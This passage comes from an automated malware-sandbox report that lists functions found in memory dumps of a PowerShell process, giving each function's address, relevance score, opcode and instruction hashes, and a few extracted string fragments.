          • Opcode Fuzzy Hash: ce13794e32eff8c59546b584ee8e7e8907dda71f6705c8ce157b677c2adfbc8f
          • Instruction Fuzzy Hash: 8C218D71A017449FDB60CFAAC48838AFBF2EF88310F28C42EC44D97705E77464418B64
          Function 046491FF Relevance: .1, Instructions: 60COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d10064eda26d3cd80beed0c8ce0dc92ac8add60141a0c8cb514fe78ab4336cbd
          • Instruction ID: d8be7184ca95e54773a0c776de5261d3e2fc85205ea00ed13a65cad3bd9c154d
          • Opcode Fuzzy Hash: d10064eda26d3cd80beed0c8ce0dc92ac8add60141a0c8cb514fe78ab4336cbd
          • Instruction Fuzzy Hash: 5E11C1367042A09FCF066B38E0985AE7BA3EFC6661325429FD446C7352CE248807879A
          Function 046442F9 Relevance: .1, Instructions: 58COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 499c86162e64aa6de19da5a5cffe9496940ffebe1576be19185e81cb99bd179f
          • Instruction ID: 9006ff6b34a0fb8f8bf14086bbe2432b635d50ff1511baf0e6680d1bc5efdb0f
          • Opcode Fuzzy Hash: 499c86162e64aa6de19da5a5cffe9496940ffebe1576be19185e81cb99bd179f
          • Instruction Fuzzy Hash: 44214F74A052598FCB05CF99C4909AEFBF1FF89310B158595E809EB352D731EC41CBA1
          Function 02E2F343 Relevance: .1, Instructions: 57COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7c0c3604dbd68e24dff8410ed47406c29a9269c745bef9ddc4ce8672e3a1c675
          • Instruction ID: d5ddae68426c1c057c1f134138f367eb3c3a60ebc71da30fe98420a3bf1e321c
          • Opcode Fuzzy Hash: 7c0c3604dbd68e24dff8410ed47406c29a9269c745bef9ddc4ce8672e3a1c675
          • Instruction Fuzzy Hash: 5A21CD76504280DFDF16CF14D9C0B16BF72FB88318F24C6A9D8094A656C33AD46ACF91
          Function 0464E3B8 Relevance: .0, Instructions: 50COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f5aa872e1f7ebe7e86e1a0c8b8519e309e49e25ed8053c6a0b88281806d358f2
          • Instruction ID: 363ce4e3c280a7cd9a4ef70d7e26a1e34a103046a6f2f899294de80e679a666b
          • Opcode Fuzzy Hash: f5aa872e1f7ebe7e86e1a0c8b8519e309e49e25ed8053c6a0b88281806d358f2
          • Instruction Fuzzy Hash: C4117970601605DFE7559F38D840A5AB7A2FBCA224B148A79D04A9B750EB36E80ACF81
          Function 0464E3C8 Relevance: .0, Instructions: 46COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 03e906eba59af12a4fb87b50bc0df802033afce89ecb31ed052bc8344f738e19
          • Instruction ID: 02b7d617b432c38d4c175b459ef79c767f21330aee8f1fc63a3e9ed05db97fc6
          • Opcode Fuzzy Hash: 03e906eba59af12a4fb87b50bc0df802033afce89ecb31ed052bc8344f738e19
          • Instruction Fuzzy Hash: 96012930701605DFE755AF38D844A5AB3A2FBCA2157148A7DD00E9BB10EB35E806CF91
          Function 02E2D005 Relevance: .0, Instructions: 45COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f9e1bd8b7f568c7d8fd3c45af502d282e2cdd19a1790708e5c8b1f38ddc2f8d7
          • Instruction ID: a68b6d4bfbe631e916132f662710b636e21d340bcc89aa788db2eda6cb1d48a2
          • Opcode Fuzzy Hash: f9e1bd8b7f568c7d8fd3c45af502d282e2cdd19a1790708e5c8b1f38ddc2f8d7
          • Instruction Fuzzy Hash: AB01B12200E3D09FE7128B258C94B52BFB4DF43224F1DC0DBD9898F1A3C2695849C772
          Function 02E2D01D Relevance: .0, Instructions: 45COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 282a49e1d32e401a35de37fdd483f2c1ee2dded3726374b8bade379f154ee565
          • Instruction ID: 3ba64651582070844606f401c584db87d88be1c739257efc43b502b713fed091
          • Opcode Fuzzy Hash: 282a49e1d32e401a35de37fdd483f2c1ee2dded3726374b8bade379f154ee565
          • Instruction Fuzzy Hash: 5F01F7314483649BE7204E15DC80F67FBA8DF81638F18C01AEE464B252C3799849C6B2
          Function 0464F6C0 Relevance: .0, Instructions: 44COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9be88658ad6f6f3c9039af2b167527133dd03dc51a54b7250546b84816e9585f
          • Instruction ID: 645afcd0b8e2fae77b53147287ec62d4b3b09aeb9199e8c45bc125c55cfd984f
          • Opcode Fuzzy Hash: 9be88658ad6f6f3c9039af2b167527133dd03dc51a54b7250546b84816e9585f
          • Instruction Fuzzy Hash: EFF0213131021057F7089A7AB8947AE779BEBC5721F108479E50AC73C1DE76DC4A8760
          Function 0464A740 Relevance: .0, Instructions: 43COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ab409ce7a6451148576485870c18a45c66d1b8f377abd067376fbb0918bdc499
          • Instruction ID: 396999b653f9ebcacd9d5da8dffa61bf927cddf675a70a3616ea17bba5974e2e
          • Opcode Fuzzy Hash: ab409ce7a6451148576485870c18a45c66d1b8f377abd067376fbb0918bdc499
          • Instruction Fuzzy Hash: 77F0F4317443506BE718A679AC94B9F3793AFC8B10FA44A6CE0425F385CDA46C0A4B98
          Function 0464F6AF Relevance: .0, Instructions: 42COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4b71d8b081c2be9e4c9bf64aa9cc4c6d162ce6613e1f1bfe4a5e3ed4f8427a1b
          • Instruction ID: 8be41133fbad6bb8ca212f94c31b2473bcbc646984b2b6708ce394cf16ffea76
          • Opcode Fuzzy Hash: 4b71d8b081c2be9e4c9bf64aa9cc4c6d162ce6613e1f1bfe4a5e3ed4f8427a1b
          • Instruction Fuzzy Hash: AAF0F6357002101BE7089A7AA4D47AA67D7AFC8310F24857DE60A8B7C5DDB59C0A8B50
          Function 0464A750 Relevance: .0, Instructions: 39COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 11322f9c74e7142e8b111e2e717f994d07a9a3056a7b872073f7a7ae02fecb56
          • Instruction ID: 1937640d3328ec1b5c055bda46d1d1fe22fe7dfec7bf4084b28bfd7b6cce2ca0
          • Opcode Fuzzy Hash: 11322f9c74e7142e8b111e2e717f994d07a9a3056a7b872073f7a7ae02fecb56
          • Instruction Fuzzy Hash: 90F024303843506BE218E66AAC50F1F3797AFC8B10FA0497DE1065F3C5CDB0AC094BA9
          Function 0464AA58 Relevance: .0, Instructions: 38COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 545c3397a456e7c2f5bb0acb3acc47f25c3d19cf0812c0b370a534edc0c85346
          • Instruction ID: 36be5a9a1dc838bd3b0825748755bbb4d8431b986a1154d1813322d58551f2bf
          • Opcode Fuzzy Hash: 545c3397a456e7c2f5bb0acb3acc47f25c3d19cf0812c0b370a534edc0c85346
          • Instruction Fuzzy Hash: EAF0F6353002109BDF146A69A44476A73E7FBC9210B44452DD00F87744EE75984A4792
          Function 04649230 Relevance: .0, Instructions: 37COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 15f2a0828f1e5a93a5a3ca467df631a8ef920f30b8d037dceae8d8482914083e
          • Instruction ID: 4ecb8ef5fc3e6d1c203b4a419ed93ddf4faa9fe609e3246b47f5c1d45b50b143
          • Opcode Fuzzy Hash: 15f2a0828f1e5a93a5a3ca467df631a8ef920f30b8d037dceae8d8482914083e
          • Instruction Fuzzy Hash: 35F030353105149B8B456BA8E05843EB7EBEFC9761365415EE807C3352CF749C038B99
          Function 0464BE37 Relevance: .0, Instructions: 35COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: defd00a18ad3065e0d8fea9ca1966c5911f82f5bd6966d864534bbb60021bd4a
          • Instruction ID: 25d01125b4f1f99bf7f56b7183f6a6a850875b913f00f05e97b5760ce1c2b42a
          • Opcode Fuzzy Hash: defd00a18ad3065e0d8fea9ca1966c5911f82f5bd6966d864534bbb60021bd4a
          • Instruction Fuzzy Hash: 21F0C2356082804FE716AB79C4547AB7FE6EFC2314F1481AED4468B786CE3D280ACF91
          Function 0464BE48 Relevance: .0, Instructions: 31COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 276b4ee72a355a9ed1b559d67a7f542c52103dfa4ced2c557b824b24081960d3
          • Instruction ID: 4cc8694a66bfee8a16217fa3ec5bda4638ee2ca26ad21447b2f71507a7a73f3f
          • Opcode Fuzzy Hash: 276b4ee72a355a9ed1b559d67a7f542c52103dfa4ced2c557b824b24081960d3
          • Instruction Fuzzy Hash: F3F027356042045BE704BB69C4087AB7BA6EFC1314F20816DD50647384CE3D38068FE0
          Function 0464BEB7 Relevance: .0, Instructions: 31COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e5ac3b0f6c2ae700480e53095cc36ccea00210fc3423592478b1e81c756582ef
          • Instruction ID: c8a783fac23db6279f17be2699e9e923fda79d7d95db2ac577468b308ec19a2a
          • Opcode Fuzzy Hash: e5ac3b0f6c2ae700480e53095cc36ccea00210fc3423592478b1e81c756582ef
          • Instruction Fuzzy Hash: 4AF058B0A003105FDB60EB78D0D83AA7FE1EB59311F54456DE54AC3781DB79688A8F50
          Function 0464AA4A Relevance: .0, Instructions: 31COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0fc4ba0383498250d670abbba8971a5f930b43f0bec0ee9ae67d6d7255f51dad
          • Instruction ID: abdefcc8e85a0f0815293eb5878ba569db9c8cd32587b3bc3a227c0d5b33a9b7
          • Opcode Fuzzy Hash: 0fc4ba0383498250d670abbba8971a5f930b43f0bec0ee9ae67d6d7255f51dad
          • Instruction Fuzzy Hash: 66F05C353043505BDF011678B4986AF7FA2EFC9310715417ED00EC7342DD254C064752
          Function 04642CB6 Relevance: .0, Instructions: 29COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 98626b806626aa56f4973219d48124479b3819abebbb57411adb41a17d704257
          • Instruction ID: dffa0e0dfc90446e9f5ac47dc3dbbcc3f665f9087ae01693b1272e12a63f73c5
          • Opcode Fuzzy Hash: 98626b806626aa56f4973219d48124479b3819abebbb57411adb41a17d704257
          • Instruction Fuzzy Hash: 8FF0B735A001099FDB14CF99D890AEEF7B1FF88324F208159E515A73A1C732A862CB51
          Function 0464B6CA Relevance: .0, Instructions: 28COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d54bf8ad7b18a5ee1be5518599c88e1ee8014939e0b9e42f94e57438437af698
          • Instruction ID: d7a2e8a3fcf3b2bbcbda4102f37fa011d6304068fd0f8c4b52dc31a01dda9066
          • Opcode Fuzzy Hash: d54bf8ad7b18a5ee1be5518599c88e1ee8014939e0b9e42f94e57438437af698
          • Instruction Fuzzy Hash: E0F0E5753086546BDF0A6774A41C25D3F66EFC9321F05017EE50687382DF681C068BE5
          Function 0464C2A2 Relevance: .0, Instructions: 27COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: dc978094f39d2d36bcad462d074065daa1bd7e76a9dcbf8a80ac639e19ce4fc2
          • Instruction ID: 1fba6b08fca853dd6f34f7d0a8a9ccabf920c7991c3b4a56a2be820284727be3
          • Opcode Fuzzy Hash: dc978094f39d2d36bcad462d074065daa1bd7e76a9dcbf8a80ac639e19ce4fc2
          • Instruction Fuzzy Hash: 01E02C227002610BEF2030FD88803BF4ACAAFCA5A1B06017ECA00C3B83FC84EC0243A1
          Function 0464BEC8 Relevance: .0, Instructions: 25COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b55b2aa98e2794a0d8d8dd8934e2b630900b74b2c10b6e754dd3f40dd07cc883
          • Instruction ID: 390c5cffbecc7d21cfd6f5da36d0bde6a8536a5f6e512136d2a2883a74af015c
          • Opcode Fuzzy Hash: b55b2aa98e2794a0d8d8dd8934e2b630900b74b2c10b6e754dd3f40dd07cc883
          • Instruction Fuzzy Hash: 6BF06D70A003149BD760DF79D49839A7BE5EB44310F14446DE51EC3380DF39A8808F90
          Function 0464B6D8 Relevance: .0, Instructions: 24COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e35646a3217804424f45c2d54d907f8d5915d6243f204e7c23ea4d761129b79b
          • Instruction ID: 98bd8f3427383a7659b0a26b5468374cdc41b04384d0bf318f7a899895333c44
          • Opcode Fuzzy Hash: e35646a3217804424f45c2d54d907f8d5915d6243f204e7c23ea4d761129b79b
          • Instruction Fuzzy Hash: 89E0267530462867CF096BB8A41C2AE7B56EFC4724F04013DE50A83342DF38180287E9
          Function 0464E720 Relevance: .0, Instructions: 24COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 549ccb8d29b6dc57eca6d30d2dd8d3ab988bcf4f0d351066e0fbe208d7c6d3ee
          • Instruction ID: d7f669173eaf30441e97db6478fd3454ff5e3f8c100381857cfe586a5edc1dfc
          • Opcode Fuzzy Hash: 549ccb8d29b6dc57eca6d30d2dd8d3ab988bcf4f0d351066e0fbe208d7c6d3ee
          • Instruction Fuzzy Hash: 1BD05B267082901B5F19916EB4505AB5BD757D5720319C17FD559C7345DD518C0643D0
          Function 0464C2B0 Relevance: .0, Instructions: 23COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c65af0aee9a5d06746c5a25b1ab2f86aacc63916309cf5a685542c6554ece139
          • Instruction ID: efa8d1f4ec213eb7e989fb61c9ca65ee899e85ef854a9d5d978fa81300eef9e7
          • Opcode Fuzzy Hash: c65af0aee9a5d06746c5a25b1ab2f86aacc63916309cf5a685542c6554ece139
          • Instruction Fuzzy Hash: 55D05E22300126175F2434FE58007BFA5CE8FC68A5706013ADA04C3B82FC80FC0213F9
          Function 0464B498 Relevance: .0, Instructions: 20COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c3eaf6c628e9e62000d23431b825774f7aef9ebfba6d37f184d018f6f6c81c35
          • Instruction ID: 547260e44667081987166ac281ca96235d06897d78b752d587b9868b429591fa
          • Opcode Fuzzy Hash: c3eaf6c628e9e62000d23431b825774f7aef9ebfba6d37f184d018f6f6c81c35
          • Instruction Fuzzy Hash: C3E04F30E051099BCF08EF64D56A4FEBF71EB14310B1042ADEA0753296EA301957DF80
          Function 0464B561 Relevance: .0, Instructions: 19COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 91d077ef7b3234686983da6488f48b2c2f7cbf32bce0c417349535974029d66f
          • Instruction ID: 7854d0e249189457ba3103c77fd1556078ddb69ee7a9d51aa7760516a9aae56a
          • Opcode Fuzzy Hash: 91d077ef7b3234686983da6488f48b2c2f7cbf32bce0c417349535974029d66f
          • Instruction Fuzzy Hash: CAE04F78F051089F8F44EFB8D5859BEBFB1FB49201B10426CD90AD3351DA319802CF80
          Function 0464B4A8 Relevance: .0, Instructions: 15COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0e9e9a262ffa07aa943acc2552d1eabcda5344656b448933f844b255904a4e2f
          • Instruction ID: 48d7a25d7e6560967f6adbeb23053fef14937637f98a346e694f3d3ae201976c
          • Opcode Fuzzy Hash: 0e9e9a262ffa07aa943acc2552d1eabcda5344656b448933f844b255904a4e2f
          • Instruction Fuzzy Hash: 1FD0173090410EABCF08EBA4E82A4BEBB74EF00201F50026DEA07522D1EF302907DEC0
          Function 0464B570 Relevance: .0, Instructions: 15COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 88827617eeb51cceb573f30181d8dd2ac6518642471abe7d10a29479c08d956f
          • Instruction ID: b8dc23030de058bd457d69038c994f9d457da82d006e12ce50057df7bc71c73b
          • Opcode Fuzzy Hash: 88827617eeb51cceb573f30181d8dd2ac6518642471abe7d10a29479c08d956f
          • Instruction Fuzzy Hash: C9D01274E04108DF8B44EFA4D54687DBBB5EB44201F104168D90993350EA316842CBC1
          Function 0464FA92 Relevance: .0, Instructions: 8COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5ab9b1652e49aa14b17937ea115cb58768d8b5362d00fe1540d5202c1d6e9065
          • Instruction ID: ef64a9cd38f2f4adc7cc683457706a2b2725fe190e195bd340babb9c68722cb6
          • Opcode Fuzzy Hash: 5ab9b1652e49aa14b17937ea115cb58768d8b5362d00fe1540d5202c1d6e9065
          • Instruction Fuzzy Hash: 1AC02BD154A3812BCF61063540903043DCCEF40281F0504ECB0C0C80B3CD1C801C4309
          Function 075E1CB6 Relevance: .0, Instructions: 5COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 29fa3e92072b0f6cd1ed5738a1344f8ec11b7e12883ce8bb4aab35e6884df1f0
          • Instruction ID: 0b4be6207a92d926087b0b82fa3b5c3baa1593a8771544c8b0bae54d2c666957
          • Opcode Fuzzy Hash: 29fa3e92072b0f6cd1ed5738a1344f8ec11b7e12883ce8bb4aab35e6884df1f0
          • Instruction Fuzzy Hash: 02A011302000008BC200CA80C882800B322AB82308B28C08AA8288F282CBA3E8038B00

          Non-executed Functions

          Function 02E2D6E4 Relevance: .1, Instructions: 75COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91915979721.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2e2d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 74f1378017d3cc52e3ce317ff3ef5b66366909aa5732c93dddda4c9c2388686f
          • Instruction ID: ac0a3327afa993e8f0173ce44e32578b063a613144df2261d059d84dcc69448a
          • Opcode Fuzzy Hash: 74f1378017d3cc52e3ce317ff3ef5b66366909aa5732c93dddda4c9c2388686f
          • Instruction Fuzzy Hash: 58210776544340EFEB05DF14DDC0B16BF65FB88724F24C569E90A4B246C33AD45ACBA2
          Function 075EA610 Relevance: 11.7, Strings: 9, Instructions: 429COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: DODm$DODm$x54l$GDm$GDm$GDm$GDm$GDm$GDm
          • API String ID: 0-3740118544
          • Opcode ID: 4b6e80116b54723b3fdef23eda8017983cd96281a8b7528703ae004f0d40aa84
          • Instruction ID: 590529ac4f660165da5b1a535089fc8548057c98534792e1da034f0edd7a8cfe
          • Opcode Fuzzy Hash: 4b6e80116b54723b3fdef23eda8017983cd96281a8b7528703ae004f0d40aa84
          • Instruction Fuzzy Hash: E7E104B5B04342CFDB19CB7994506BABBBABFC6210B25C4BBC445CB255DA30CC42C7A2
          Function 075EF55D Relevance: 10.3, Strings: 8, Instructions: 286COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: ,|Am$,|Am$P0Bm$P0Bm$P0Bm$P0Bm$GDm$GDm
          • API String ID: 0-2831904625
          • Opcode ID: 9c8074375fc48c6761221d27f971adc0e46ed54ffa0e5cad74cda1a7de86a08a
          • Instruction ID: 664680189c2890d4663d2c4ff35745a717a000731479644e9e4f8f01a13e9914
          • Opcode Fuzzy Hash: 9c8074375fc48c6761221d27f971adc0e46ed54ffa0e5cad74cda1a7de86a08a
          • Instruction Fuzzy Hash: C2A1F8B5B00246DFDB588F65D510BAA77A6BF85610F14846BE805AF2D0CF31DC41CB62
          Function 075EE590 Relevance: 8.0, Strings: 6, Instructions: 480COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$GDm$GDm$GDm$GDm
          • API String ID: 0-3933061856
          • Opcode ID: 23a818f5ccde81433bcb7384d2693bf2c23c26a1af96bd94f83870a064c5ac22
          • Instruction ID: 051d58063ee9bbde9074fa29431bcd2cb3bdd137c03a8cfb417d18e0a1eff1c9
          • Opcode Fuzzy Hash: 23a818f5ccde81433bcb7384d2693bf2c23c26a1af96bd94f83870a064c5ac22
          • Instruction Fuzzy Hash: 4DF134B1714386DFFB198F69D806BEABBAAFF86210F14846BD4058B291DB31DC41C761
          Function 08E03982 Relevance: 7.8, Strings: 6, Instructions: 324COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91928051440.0000000008E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_8e00000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: P0Bm$P0Bm$P0Bm$P0Bm$GDm$GDm
          • API String ID: 0-2967788769
          • Opcode ID: 973a7e9294378f676339d42f59498c48325ba4f432788857f1cd22e920f2ce41
          • Instruction ID: 3e98bce9b4c79a1f6f3c9e33067e59ce36003760d8abee38c1289744157fb26f
